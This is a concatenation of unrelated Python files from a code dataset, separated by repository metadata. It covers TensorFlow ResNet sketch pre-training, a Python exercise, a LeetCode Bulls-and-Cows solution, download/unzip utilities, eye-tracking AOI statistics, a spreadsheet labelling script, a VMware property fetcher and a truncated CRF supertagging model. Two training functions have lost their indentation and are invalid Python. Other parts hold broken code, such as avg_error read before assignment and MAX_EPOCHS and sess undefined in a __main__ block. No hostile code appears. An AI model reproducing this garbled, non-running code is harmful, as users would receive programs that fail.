            x = conv(x, size, num_units_out)
            x = bn(x, use_bias, is_training)
            x = activation(x)
        with tf.variable_scope('b'):
            # NOTE(review): `size` is still 1 here, so the middle conv is 1x1;
            # a standard bottleneck uses 3x3 — confirm intent before changing.
            x = conv(x, size, num_units_out)
            x = bn(x, use_bias, is_training)
            x = activation(x)
        with tf.variable_scope('c'):
            size = 1
            num_units_out = filters_out
            x = conv(x, size, num_units_out)
            x = bn(x, use_bias, is_training)
    else:
        size = 3
        num_units_out = block_filter_internal
        with tf.variable_scope('A'):
            x = conv(x, size, num_units_out)
            x = bn(x, use_bias, is_training)
            x = activation(x)
        with tf.variable_scope('B'):
            x = conv(x, size, num_units_out)
            x = bn(x, use_bias, is_training)
    with tf.variable_scope('shortcut'):
        if filters_out != filters_in:
            size = 1
            shortcut = conv(shortcut, size, filters_out)
            shortcut = bn(shortcut, use_bias=use_bias, is_training=is_training)
    return activation(x + shortcut)
# ===============================================================================
# ======== a stack of full 6 block===============================================
def stack(x, size, num_blocks, bottleneck, block_filter_internal, is_training, use_bias):
    """Chain `num_blocks` residual blocks, each under scope 'block<i>'."""
    for block_idx in range(1, num_blocks + 1):
        with tf.variable_scope('block%d' % block_idx):
            x = block(x, size, bottleneck, block_filter_internal, is_training, use_bias)
    return x
#================================================================================
#=========full network========================================
def network_init(x, is_training, num_classes=125, num_blocks=None, bottleneck=False,
                 use_bias=False):
    """Build the ResNet trunk: 7x7 conv stem, four max-pooled residual stages
    with 64/128/256/512 internal filters, global average pooling, and an
    optional fully connected classifier head.

    num_blocks gives the residual blocks per stage (defaults to [2, 2, 2, 2],
    i.e. the same layout the old mutable-default argument produced); pass
    num_classes=None to skip the classifier. Also removed the unused locals
    fc_units_out and pool_step.
    """
    if num_blocks is None:
        num_blocks = [2, 2, 2, 2]
    with tf.variable_scope('scale1'):
        x = conv(x, 7, 64)
        x = bn(x, use_bias, is_training)
        x = activation(x)
    size = 3
    step = 2
    stage_filters = [64, 128, 256, 512]
    # Scope names 'scale2'..'scale5' match the original layer-by-layer code,
    # so existing checkpoints keep loading.
    for stage, block_filter_internal in enumerate(stage_filters):
        with tf.variable_scope('scale%d' % (stage + 2)):
            x = _max_pool(x, size, step)
            x = stack(x, size, num_blocks[stage], bottleneck, block_filter_internal, is_training, use_bias)
    x = tf.reduce_mean(x, reduction_indices=[1, 2], name="avg_pool")
    if num_classes is not None:
        with tf.variable_scope('fc'):
            x = fc(x, num_classes)
    return x
# =============================================================================
def pre_train_photo(photos, shuffle):
if not os.path.exists(FLAGS.photo_train_dir):
os.makedirs(FLAGS.photo_train_dir)
batch_size = 100
images = tf.placeholder(tf.float32, shape = [None, 66, 100, 3])
labels = tf.placeholder(tf.int64, shape = [None])
sess = tf.InteractiveSession()
logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
bottleneck=False)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
trainable=False)
val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
trainable=False)
loss_ = loss(logits, labels)
predictions = tf.nn.softmax(logits)
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
top_1_error = (batch_size - num_correct) / batch_size
test_size = photos.test.images.shape[0]
test_error = (test_size - num_correct) / test_size
train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
saver = tf.train.Saver(tf.all_variables())
# summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, sess.graph)
sess.run(tf.initialize_all_variables())
if (RESTORE == True):
latest = tf.train.latest_checkpoint(FLAGS.photo_train_dir)
if latest == None:
print "no saved record found"
else:
print "resume", latest
saver.restore(sess, latest)
for i in range(2000):
batch_size = 100
batch = photos.next_batch(batch_size, True, shuffle)
train_step.run(feed_dict={images: batch.images, labels: batch.labels})
error = top_1_error.eval(feed_dict={images: batch.images,
labels: batch.labels})
print 'Step', i, 'Training error:', error
if (i % 100 == 99):
avg_error = avg_error/100
error = test_error.eval(feed_dict={images: photos.test.images, labels: photos.test.labels})
print 'Training error average:', avg_error
print 'Testing error:', error
checkpoint_path = os.path.join(FLAGS.sketch_train_dir, 'model.ckpt')
open(checkpoint_path, "w+")
saver.save(sess, checkpoint_path, global_step=global_step)
avg_error = 0.0
# ===============================================================================
def pre_train_sketch(sketches, shuffle):
    """Pre-train the ResNet classifier on sketch images (1 channel, 66x100).

    Optionally restores the latest checkpoint from FLAGS.sketch_train_dir,
    runs 2000 Adam steps, and every 100 steps reports the running
    training-error average, evaluates one held-out batch, and saves a
    checkpoint. `sketches` must expose next_batch(batch_size, is_train,
    shuffle).
    """
    if not os.path.exists(FLAGS.sketch_train_dir):
        os.makedirs(FLAGS.sketch_train_dir)
    batch_size = 100
    # Grayscale input: [batch, height=66, width=100, channels=1].
    images = tf.placeholder(tf.float32, shape = [None, 66, 100, 1])
    labels = tf.placeholder(tf.int64, shape = [None])
    sess = tf.InteractiveSession()
    logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
                          bottleneck=False)
    global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
                                  trainable=False)
    val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
                               trainable=False)
    loss_ = loss(logits, labels)
    predictions = tf.nn.softmax(logits)
    # Per-batch top-1 error; test_size matches the evaluation batch size.
    in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
    num_correct = tf.reduce_sum(in_top1)
    top_1_error = (batch_size - num_correct) / batch_size
    test_size = 100
    test_error = (test_size - num_correct) / test_size
    train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
    saver = tf.train.Saver(tf.all_variables())
    sess.run(tf.initialize_all_variables())
    # restore variable from previous training if specified
    if (RESTORE == True):
        latest = tf.train.latest_checkpoint(FLAGS.sketch_train_dir)
        if latest == None:
            print "no saved record found"
        else:
            print "resume", latest
            saver.restore(sess, latest)
    # start training
    avg_error = 0.0;
    for i in range(2000):
        batch = sketches.next_batch(batch_size, True, shuffle)
        train_step.run(feed_dict={images: batch.images, labels: batch.labels})
        error = top_1_error.eval(feed_dict={images: batch.images, labels: batch.labels})
        print 'Step', i, 'Training error:', error
        avg_error += error
        # After 100 times of training, test on validation set
        # Save variables for future restoring
        # NOTE(review): this also fires at i == 0, so the first "average"
        # divides a single step's error by 100 — confirm whether
        # (i % 100 == 99) was intended.
        if (i % 100 == 0):
            avg_error = avg_error/100
            batch = sketches.next_batch(batch_size, False, shuffle)
            error = test_error.eval(feed_dict={images: batch.images, labels: batch.labels})
            print 'Training error average:', avg_error
            print 'Testing error:', error
            checkpoint_path = os.path.join(FLAGS.sketch_train_dir, 'model.ckpt')
            # NOTE(review): truncates model.ckpt and leaks the file handle;
            # tf.train.Saver writes its own files — confirm it can be dropped.
            open(checkpoint_path, "w+")
            saver.save(sess, checkpoint_path, global_step=global_step)
            avg_error = 0.0
    return
# =========================================================================================
def pre_train_edgemaps(edgemaps, shuffle):
if not os.path.exists(FLAGS.sketch_train_dir):
os.makedirs(FLAGS.sketch_train_dir)
batch_size = 100
images = tf.placeholder(tf.float32, shape = [None, 66, 100, 1])
labels = tf.placeholder(tf.int64, shape = [None])
sess = tf.InteractiveSession()
logits = network_init(images, is_training=True, num_classes=125, num_blocks=[2, 2, 2, 2],
bottleneck=False)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0),
trainable=False)
val_step = tf.get_variable('val_step', [], initializer=tf.constant_initializer(0),
trainable=False)
loss_ = loss(logits, labels)
predictions = tf.nn.softmax(logits)
in_top1 = tf.to_float(tf.nn.in_top_k(predictions, labels, k=1))
num_correct = tf.reduce_sum(in_top1)
top_1_error = (batch_size - num_correct) / batch_size
test_size = 1000
test_error = (test_size - num_correct) / test_size
train_step = tf.train.AdamOptimizer(1e-4).minimize(loss_)
saver = tf.train.Saver(tf.all_variables())
sess.run(tf.initialize_all_variables())
# restore variable from previous training if specified
if (RESTORE == True):
latest = tf.train.latest_checkpoint(FLAGS.combined_train_dir)
if latest == None:
print "no saved record found"
else:
print "resume", latest
saver.restore(sess, latest)
# start training
avg_error = 0.0;
for i in range(2000):
batch = edgemaps.next_batch(batch_size, True, shuffle)
train_step.run(feed_dict={images: batch.images, labels: batch.labels})
error = top_1_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Step', i, 'Training error:', error
avg_error += error
# After 100 times of training, test on validation set
# Save variables for future restoring
if (i % 100 == 0):
avg_error = avg_error/100
batch = edgemaps.next_batch(batch_size, False, shuffle)
error = test_error.eval(feed_dict={images: batch.images, labels: batch.labels})
print 'Training error average:', avg_error
print 'Testing error:', error
checkpoint_path = os.path.join(FLAGS.combined_train_dir, 'model.ckpt')
open(checkpoint_path, "w+")
saver.save(sess, checkpoint_path, global_step=global_step)
avg_error = 0.0
return | [
"tcai4@illinois.edu"
] | tcai4@illinois.edu |
4544e9694446fd03dbbdaa647b3ffb6d8e6363ec | fa97547f32367535436e112e1da8d61dcb3ebd90 | /ex18.py | 57d230a2f63b2db524b03ee086552f4bf7b0fc34 | [] | no_license | wufei74/lpthw | f7bf5c9ccad7bac6e42035c87aeb1d6d13f466e9 | b974f924e71c14b25d26b51f4045be3134bfb85c | refs/heads/master | 2022-12-01T16:30:12.670126 | 2020-08-16T00:32:51 | 2020-08-16T00:32:51 | 285,600,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 19:24:57 2020
@author: WufeiNewPC
"""
#ex18.py
# this one is like your scripts with argv
def print_two(*args):
    """Unpack exactly three positional args, print the first two, then the tuple."""
    first, second, third = args
    print(f"arg1: {first}, arg2: {second}")
    print(args)
# ok, that *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
    """Print both arguments, using named parameters instead of *args."""
    message = f"arg1: {arg1}, arg2: {arg2}"
    print(message)
#this just takes one argument
def print_one(arg1):
    """Print the single argument, first labelled, then bare."""
    for line in (f"arg1: {arg1}", arg1):
        print(line)
#@this one takes no arguments
def print_none():
    """Take no arguments and print a fixed message (flushed immediately)."""
    message = "I got nothin.'."
    print(message, flush=True)
# Exercise each helper: three positional args via *args, then two named
# parameters, then one, then none.
print_two("Zed", "Shaw", "fdasfsda")
print_two_again("Zed", "Shaw")
print_one("First!")
print_none()
| [
"noreply@github.com"
] | wufei74.noreply@github.com |
c86b19c4c30e2fabbe0d81972a65af9e5be88efe | de6dc75873bd8615d22dd25c51f2fe3bc82cd7f8 | /069.猜数字游戏.py | 07de0ac470912f9fd6bb2e924865ff59a1419c0a | [] | no_license | cuimin07/LeetCode-test | b9e87b4e353b09dfa84f62c24c2950d57656fff2 | 8f02b78dcbdefa154bb52c14a271998361e92a86 | refs/heads/master | 2020-08-14T13:37:27.799071 | 2020-01-13T03:11:40 | 2020-01-13T03:11:40 | 215,178,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | '''
你正在和你的朋友玩 猜数字(Bulls and Cows)游戏:你写下一个数字让你的朋友猜。
每次他猜测后,你给他一个提示,告诉他有多少位数字和确切位置都猜对了(称为“Bulls”, 公牛),
有多少位数字猜对了但是位置不对(称为“Cows”, 奶牛)。你的朋友将会根据提示继续猜,直到猜出秘密数字。
请写出一个根据秘密数字和朋友的猜测数返回提示的函数,用 A 表示公牛,用 B 表示奶牛。
请注意秘密数字和朋友的猜测数都可能含有重复数字。
示例 1:
输入: secret = "1807", guess = "7810"
输出: "1A3B"
解释: 1 公牛和 3 奶牛。公牛是 8,奶牛是 0, 1 和 7。
示例 2:
输入: secret = "1123", guess = "0111"
输出: "1A1B"
解释: 朋友猜测数中的第一个 1 是公牛,第二个或第三个 1 可被视为奶牛。
说明: 你可以假设秘密数字和朋友的猜测数都只包含数字,并且它们的长度永远相等。
'''
#答:
class Solution:
    def getHint(self, secret: str, guess: str) -> str:
        """Bulls and Cows hint: 'xAyB' where x counts exact matches (bulls)
        and y counts digits present but misplaced (cows). secret and guess
        have equal length and contain only digits."""
        bulls = 0
        secret_left = {}  # digit -> count among non-bull secret positions
        guess_left = {}   # digit -> count among non-bull guess positions
        for s_ch, g_ch in zip(secret, guess):
            if s_ch == g_ch:
                bulls += 1
            else:
                secret_left[s_ch] = secret_left.get(s_ch, 0) + 1
                guess_left[g_ch] = guess_left.get(g_ch, 0) + 1
        # Each digit contributes min(count in secret, count in guess) cows.
        cows = sum(min(count, guess_left[digit])
                   for digit, count in secret_left.items()
                   if digit in guess_left)
        return str(bulls) + 'A' + str(cows) + 'B'
| [
"noreply@github.com"
] | cuimin07.noreply@github.com |
e62f212ff2c79b3fc7237b9f611dd62f31bf1153 | 1498a42a13fb6148cd0c100226c7aeeffe537d15 | /app/utils.py | facff88c34963a6bb8f902ae73c26a5bb9875249 | [] | no_license | perseptron/autopark_fill | 68b5f27fa921b8871551111ac9be2251fd2e811b | e70089b5b327400e9794f6e9efc9c7a529d589e2 | refs/heads/master | 2023-05-08T04:49:50.455264 | 2021-04-24T10:07:31 | 2021-04-24T10:07:31 | 355,658,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,359 | py | import zipfile
import requests
def download(url, file, **kwargs):
    """Stream `url` into `file`, calling kwargs['progress'](percent, total)
    whenever the rounded percentage grows."""
    on_progress = kwargs.get('progress', None)
    last_reported = 0
    with requests.get(url, stream=True) as response:
        response.raise_for_status()
        total = int(response.headers['content-length'])
        with open(file, 'wb') as out:
            for chunk in response.iter_content(chunk_size=8192):
                if not chunk:
                    continue
                out.write(chunk)
                if on_progress:
                    percent = round(out.tell() / total * 100)
                    if percent - last_reported > 0.5:
                        on_progress(percent, total)
                        last_reported = percent
def unzip(file_path, **kwargs):
    """Extract every member of the zip archive into the current directory.

    kwargs['progress'], if given, is called as progress(bytes_done,
    bytes_total) before each member is extracted (uncompressed byte counts).
    Returns the archive's member list (ZipInfo objects).
    """
    progress = kwargs.get('progress', None)
    # with-block closes the archive even on failure (the original leaked the
    # handle); the loop variable no longer shadows the builtin `file`.
    with zipfile.ZipFile(file_path) as zf:
        members = zf.infolist()
        uncompress_size = sum(member.file_size for member in members)
        extracted_size = 0
        for member in members:
            extracted_size += member.file_size
            if progress:
                progress(extracted_size, uncompress_size)
            zf.extract(member)
        return members
def get_lines_count(file_path):
    """Count newline bytes in file_path, reading in 8 MiB binary chunks."""
    print('counting...')
    count = 0
    # with-block guarantees the handle is closed even if a read fails
    # (the original leaked it on error paths).
    with open(file_path, 'rb') as source:
        while True:
            chunk = source.read(8192 * 1024)
            if not chunk:
                break
            count += chunk.count(b'\n')
    return count
return count | [
"perseptron@gmail.com"
] | perseptron@gmail.com |
56d6a92721146f71b6758e01c2158030aa8da632 | 912b0c50b7f07e837dbbe5d784e9e3c62f484b96 | /old_Nick/AOI.py | 907b6cb6dc1c46167f6c24491291b1f1eaacbb03 | [] | no_license | oschmid/EMDAT | 5237f8309a24b71cb91b4f6c2e447fd56298eb9d | ea5f2a41a52b888935e4a7b8f0eb1481c3989e4d | refs/heads/master | 2021-01-18T13:32:51.095366 | 2012-06-19T18:05:23 | 2012-06-19T18:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py | from utils import *
class AOI():
    """Fixation statistics for one Area Of Interest (AOI).

    The AOI is the region inside `polyin` minus the region inside `polyout`.
    __init__ stores, as attributes: fixation counts and durations, times to
    first/last fixation relative to `starttime`, proportions over the whole
    trial, and transition counts/proportions to and from every AOI listed in
    `aois` (a list of (aid, polyin, polyout) triples).
    NOTE(review): filter()/map() results are used with len() and indexing, so
    this code assumes Python 2 list semantics — confirm before porting.
    """
    def __init__(self, aid, polyin, polyout, fixation_data, starttime, endtime,
                 aois):
        self.aid = aid
        self.polyin = polyin
        self.polyout = polyout
        # Indices of fixations that land inside this AOI, in temporal order.
        fixation_indices = filter(lambda i: fixation_in_aoi(fixation_data[i],
            polyin, polyout), range(len(fixation_data)))
        fixations = map(lambda i: fixation_data[i], fixation_indices)
        self.numfixations = len(fixations)
        # -1 marks "no fixation in this AOI" for the time-based metrics.
        self.longestfixation = -1
        self.timetofirstfixation = -1
        self.timetolastfixation = -1
        self.proportionnum = 0
        self.totaltimespent = sum(map(lambda x: x.fixationduration, fixations))
        self.proportiontime = float(self.totaltimespent)/(endtime - starttime)
        if self.numfixations > 0:
            self.longestfixation = max(map(lambda x: x.fixationduration,
                fixations))
            self.timetofirstfixation = fixations[0].timestamp - starttime
            self.timetolastfixation = fixations[-1].timestamp - starttime
            self.proportionnum = float(self.numfixations)/len(fixation_data)
        # Transition counts to/from every AOI (including this one).
        # NOTE(review): the loop tuples below rebind the aid/polyin/polyout
        # parameters; harmless only because they were stored on self above.
        self.numtransto = {}
        self.numtransfrom = {}
        for (aid, x, y) in aois:
            self.numtransto[aid] = 0
            self.numtransfrom[aid] = 0
        for i in fixation_indices:
            if i > 0:
                for (aid, polyin, polyout) in aois:
                    if fixation_in_aoi(fixation_data[i-1], polyin, polyout):
                        self.numtransfrom[aid]+=1
            # NOTE(review): i < len(fixation_data)-2 skips the second-to-last
            # fixation even though i+1 would still be a valid index — confirm
            # whether len(fixation_data)-1 was intended.
            if i < len(fixation_data)-2:
                for (aid, polyin, polyout) in aois:
                    if fixation_in_aoi(fixation_data[i+1], polyin, polyout):
                        self.numtransto[aid]+=1
        # Normalize the counts into proportions (0 when no transitions).
        self.proptransto = {}
        self.proptransfrom = {}
        sumtransto = sum(self.numtransto.values())
        sumtransfrom = sum(self.numtransfrom.values())
        for key, val in self.numtransto.items():
            if sumtransto > 0:
                self.proptransto[key] = float(self.numtransto[key]) / sumtransto
            else:
                self.proptransto[key] = 0
        for key, val in self.numtransfrom.items():
            if sumtransfrom > 0:
                self.proptransfrom[key] = float(self.numtransfrom[key]) / sumtransfrom
            else:
                self.proptransfrom[key] = 0
def fixation_in_aoi(fixation, polyin, polyout):
    """True when the fixation point lies inside polyin but outside polyout."""
    px = fixation.mappedfixationpointx
    py = fixation.mappedfixationpointy
    # Same short-circuit order as the original `and not` expression.
    if not point_inside_polygon(px, py, polyin):
        return False
    return not point_inside_polygon(px, py, polyout)
| [
"bensteichen@gmail.com"
] | bensteichen@gmail.com |
2bb733a96a9e609fee6a44d8e62dcfec06623420 | 7b82fa85a26ecef6580c7744b321d25d4215ecd3 | /4finalSummary.py | 087eee6ed532f52874bbcaa0281d86ad7f0c7f94 | [] | no_license | fangzhao2019/Character-encoding-analysis | cdd3ba03ef130abb002655d2d63ef669ed23c48a | 870b936eebff78a44a6ef06ccee94254e361d563 | refs/heads/master | 2023-04-10T14:57:11.213421 | 2023-03-15T16:20:31 | 2023-03-15T16:20:31 | 322,670,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 938 | py | from openpyxl import load_workbook
import os
# Build a {ttf_name: {code: word}} lookup from the clustered image files, then
# write the recognized word (or 'CHANGE' when missing) into column 7 of the
# spreadsheet. Fixes: removed the dead `i+=1` (the `for` loop variable is
# reassigned on every iteration anyway), narrowed the bare `except:` to
# KeyError, and dropped the unused `a` counter and `word` cell read.
path = 'cluster_results'
recogResult = {}
wordNames = os.listdir(path)
wordNames.remove('null')  # skip the unclassified bucket
for word in wordNames:
    imageNames = os.listdir('%s/%s' % (path, word))
    for imageName in imageNames:
        # File names look like '<ttf_name>_uni<code>.png'.
        ttf_name, image = imageName.split('_uni')
        code = image.replace('.png', '')
        if ttf_name not in recogResult:
            recogResult[ttf_name] = {}
        recogResult[ttf_name][code] = word
wb = load_workbook('coding3.xlsx')
ws = wb.active
for i in range(2, ws.max_row + 1):  # row 1 is the header
    ttf_name = ws.cell(row=i, column=2).value
    code = ws.cell(row=i, column=3).value
    try:
        ws.cell(row=i, column=7).value = recogResult[ttf_name][code]
    except KeyError:
        ws.cell(row=i, column=7).value = 'CHANGE'
    if i % 1000 == 0:
        print('已处理数据%d条' % i)
wb.save('finalCoding.xlsx')
| [
"1311778207@qq.com"
] | 1311778207@qq.com |
e686b01403ab17049ad212cde428b766ca9b55f6 | 973b40c806bfcfdfbe4258b3decd9e52f8d4b574 | /vmware_exporter/helpers.py | e6df9262e3710f638050d836a6405a66c56421ae | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | gitter-badger/vmware_exporter | 467507e83551134f2e89b7fb3125bccb949113d4 | d805dde7ff768d55e96719fcd727a6f4b5e81dc7 | refs/heads/master | 2020-04-13T17:06:59.370635 | 2018-12-24T05:19:48 | 2018-12-24T05:19:48 | 163,339,090 | 0 | 0 | null | 2018-12-27T21:53:31 | 2018-12-27T21:53:31 | null | UTF-8 | Python | false | false | 1,375 | py | from pyVmomi import vmodl
def batch_fetch_properties(content, obj_type, properties):
    """Fetch `properties` for every managed object of `obj_type` in one
    PropertyCollector call.

    Returns {moId: {'obj': managed object, 'id': moId, <prop>: <value>, ...}}.
    """
    view_ref = content.viewManager.CreateContainerView(
        container=content.rootFolder,
        type=[obj_type],
        recursive=True
    )
    collector = vmodl.query.PropertyCollector
    # Which properties to pull for obj_type.
    property_spec = collector.PropertySpec()
    property_spec.type = obj_type
    property_spec.pathSet = properties
    # How to walk from the container view to the entities it holds.
    traversal_spec = collector.TraversalSpec()
    traversal_spec.name = 'traverseEntities'
    traversal_spec.path = 'view'
    traversal_spec.skip = False
    traversal_spec.type = view_ref.__class__
    obj_spec = collector.ObjectSpec()
    obj_spec.obj = view_ref
    obj_spec.skip = True
    obj_spec.selectSet = [traversal_spec]
    filter_spec = collector.FilterSpec()
    filter_spec.objectSet = [obj_spec]
    filter_spec.propSet = [property_spec]
    retrieved = content.propertyCollector.RetrieveContents([filter_spec])
    results = {}
    for item in retrieved:
        entry = {'obj': item.obj, 'id': item.obj._moId}
        for prop in item.propSet:
            entry[prop.name] = prop.val
        results[item.obj._moId] = entry
    return results
| [
"noreply@github.com"
] | gitter-badger.noreply@github.com |
80c52a096b50d0287dba9cba6163b81cb10c9a7a | b7c3e641ad5874db8e9bec371b581e4063fe3efc | /tf_function_test.py | 50e5052139b0936959624f915fe460ab23da138e | [] | no_license | rekyyang/resnet-fcn-tensorflow | 469037f05e3138f843a97997e822705173a3655a | e518c4da676a57e837de197c543995e99b6ef89c | refs/heads/master | 2020-04-01T20:36:10.229812 | 2018-10-25T11:39:50 | 2018-10-25T11:39:50 | 153,611,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,389 | py | import tensorflow as tf
import numpy as np
import os
import cv2
def main():
    """Scratch checks of a few TF ops: moments, batch norm graph construction,
    and the output shape of a strided transposed convolution."""
    sample = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])
    image = tf.placeholder(tf.float32, [None, 2, 2])
    print(image.shape)
    bn = tf.layers.batch_normalization(image)  # built only to add it to the graph
    mean, var = tf.nn.moments(image, axes=[0])
    image2 = tf.placeholder(tf.float32, [None, 256, 256, 3])
    conv1 = tf.layers.conv2d_transpose(image2,
                                       filters=6,
                                       kernel_size=[1, 1],
                                       strides=[2, 2],
                                       padding="SAME",
                                       name="conv1")
    print(conv1.shape)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        result = sess.run(mean, feed_dict={image: sample})
    print(sample.shape[2])
    return 0
if __name__ == "__main__":
    # NOTE(review): this block cannot run as written — MAX_EPOCHS is never
    # defined and `sess` is not in scope here (a Session only exists inside
    # main()), so the lines using them raise NameError.
    # NOTE(review): os.listdir returns bare file names without the
    # "./dataset_train/train/" prefix — confirm the queue gets usable paths.
    filename = os.listdir("./dataset_train/train")
    filename_queue = tf.train.string_input_producer(filename, shuffle=True, num_epochs=MAX_EPOCHS)
    reader = tf.WholeFileReader()
    key, value = reader.read(filename_queue)
    tf.local_variables_initializer().run()
    threads = tf.train.start_queue_runners(sess=sess)
    # main()
| [
"noreply@github.com"
] | rekyyang.noreply@github.com |
9ba786b662513ca4cd8f52d4f6c974a781b6c899 | 5ae07391de50f1aec4dac6e03ff20deb46385c07 | /utils/obsolete/stagging_model_crf.py | ec00ae60f404ff8f4ea0eaf9c3a0d07b86d5262d | [] | no_license | jungokasai/bilstm_stagging | 361c895d63df667f8ff4981a863396e90ccdac8e | 80608daf38a101b1506967a7fc1db8fb2e298088 | refs/heads/master | 2021-01-01T19:54:39.293477 | 2019-03-08T01:21:07 | 2019-03-08T01:21:07 | 98,720,683 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 20,230 | py | from __future__ import print_function
from data_process_secsplit import Dataset
from stagging_model import Stagging_Model
from lstm import get_lstm_weights, lstm
from back_tracking import back_track
from crf import crf
import numpy as np
import tensorflow as tf
from tensorflow.contrib.seq2seq import sequence_loss
import os
import sys
import time
class Stagging_Model_CRF(Stagging_Model):
def feed_to_crf(self, inputs):
name = 'CRF'
with tf.variable_scope(name) as scope:
proj_U = tf.get_variable('weight', [self.outputs_dim, self.opts.lm])
proj_b = tf.get_variable('bias', [self.opts.lm])
outputs = tf.nn.relu(tf.matmul(inputs, proj_U)+proj_b)
return outputs
def add_final_projection(self, inputs, reuse=False, name=None):
if name is None:
name = 'Final_Projection'
with tf.variable_scope(name) as scope:
if reuse:
scope.reuse_variables()
proj_U = tf.get_variable('weight', [self.opts.lm, self.loader.nb_tags])
proj_b = tf.get_variable('bias', [self.loader.nb_tags])
outputs = tf.matmul(inputs, proj_U)+proj_b
return outputs
    def add_stag_embedding_mat(self):
        # Per-tag weight tensor consumed by the CRF recursion: one [lm, lm+1]
        # slice per tag. The extra tag row is the padding id; the extra column
        # is presumably a bias term used inside crf() — confirm there.
        with tf.variable_scope('stag_embedding') as scope:
            self.stag_embedding_mat = tf.get_variable('stag_embedding_mat', [self.loader.nb_tags+1, self.opts.lm, self.opts.lm+1]) # +1 for padding +1 for bias
def add_stag_dropout_mat(self, batch_size):
self.stag_dropout_mat = tf.ones([batch_size, self.opts.lm])
self.stag_dropout_mat = tf.nn.dropout(self.stag_dropout_mat, self.input_keep_prob)
def add_stag_embedding(self, stags=None): # if None, use gold stags
with tf.device('/cpu:0'):
if stags is None:
stags = self.inputs_placeholder_dict['tags']
inputs = tf.nn.embedding_lookup(self.stag_embedding_mat, stags) ## [batch_size, stag_dims]
return inputs
## Greedy Supertagging
    def add_crf_path(self, crf_inputs, reuse=False):
        """Greedy left-to-right CRF decoding over a time-major sequence.

        crf_inputs: [seq_len, batch_size, lm]. Returns batch-major
        (predictions, projected_outputs) for accuracy/loss computation.
        """
        batch_size = tf.shape(crf_inputs)[1]
        ## tf.scan state carried between time steps (two elements):
        ## 1. Previous predictions (stag_idx): [batch_size]
        ## 2. In addition, though it's not a memory state, we also add projected_outputs for calculation of loss: [batch_size, outputs_dim]
        prev_init = [tf.zeros([batch_size], tf.int32), tf.zeros([batch_size, self.loader.nb_tags])]
        ## Define all the necessary weights for recursion
        self.add_stag_embedding_mat()
        self.add_stag_dropout_mat(batch_size)
        # Run add_one_crf once per time step, threading the state above.
        all_states = tf.scan(lambda prev, x: self.add_one_crf(prev, x), crf_inputs, prev_init)
        all_predictions = all_states[0] # [seq_len, batch_size]
        all_predictions = tf.transpose(all_predictions, perm=[1, 0]) # [batch_size, seq_len]
        all_projected_outputs = all_states[1] # [seq_len, batch_size, outputs_dim]
        all_projected_outputs = tf.transpose(all_projected_outputs, perm=[1, 0, 2]) # [batch_size, seq_len, outputs_dim]
        return all_predictions, all_projected_outputs
def add_one_crf(self, prev_list, crf_inputs):
## crf_inputs [batch_size, lm]
prev_predictions = prev_list[0]
crf_weights = self.add_stag_embedding(prev_predictions) ## [batch_size, lm, lm+1]
crf_outputs = crf(crf_inputs, crf_weights) ## [batch_size, lm]
projected_outputs = self.add_final_projection(crf_outputs)
predictions = self.add_predictions(projected_outputs) ## [batch_sizes]
new_state = [predictions, projected_outputs]
return new_state
def add_predictions(self, output):
predictions = tf.cast(tf.argmax(output, 1), tf.int32) ## [batch_size, nb_tags] -> [batch_size]
return predictions
def add_lm_accuracy(self):
correct_predictions = self.weight*tf.cast(tf.equal(self.predictions, self.inputs_placeholder_dict['tags']), tf.float32)
self.accuracy = tf.reduce_sum(tf.cast(correct_predictions, tf.float32))/tf.reduce_sum(tf.cast(self.weight, tf.float32))
    def add_top_k(self, output, prev_scores, beam_size, post_first):
        """Accumulate log-probabilities and keep the top *beam_size* hypotheses.

        NOTE(review): the `/` in the reshape below is Python-2 integer
        division (this file uses xrange elsewhere); under Python 3 it would
        produce a float shape and fail -- confirm before porting.
        """
        output = tf.nn.log_softmax(output) + prev_scores ## post_first: [batch_size (self.batch_size*beam_size), nb_tags], first iteration: [self.batch_size, nb_tags]
        if post_first:
            output = tf.reshape(output, [tf.shape(output)[0]/beam_size, self.loader.nb_tags*beam_size])
        scores, indices = tf.nn.top_k(output, k=beam_size) ## [self.batch_size, beam_size], [self.batch_size, beam_size]
        return scores, indices
## Supertagging
## Beware of the following notation: batch_size = self.batch_size*beam_size
    def add_forward_beam_path(self, forward_inputs_tensor, backward_embeddings, beam_size):
        """Build the beam-search decoding graph over the forward LSTM.

        The first step runs on self.batch_size configurations; every later
        step runs on self.batch_size*beam_size. Returns
        (all_predictions [batch_size, seq_len],
         all_scores [batch_size, seq_len],
         back_pointers [batch_size, seq_len-1]) for later back-tracking.
        """
        batch_size = tf.shape(forward_inputs_tensor)[1] ## batch_size = self.batch_size = b
        prev_init = [tf.zeros([2, batch_size, self.opts.num_layers*self.opts.units]), tf.zeros([batch_size], tf.int32), 0, tf.zeros([batch_size, 1]), tf.zeros([batch_size], tf.int32)]
        ## We need the following memory states (list of four elements):
        ## 1. LSTM cell and h memories for each layer: [2, batch_size, units*num_layers]
        ## 2. Previous predictions (stag_idx): [batch_size] ## notice the difference between beam and greedy here
        ## 3. Time step for referencing backward path: int
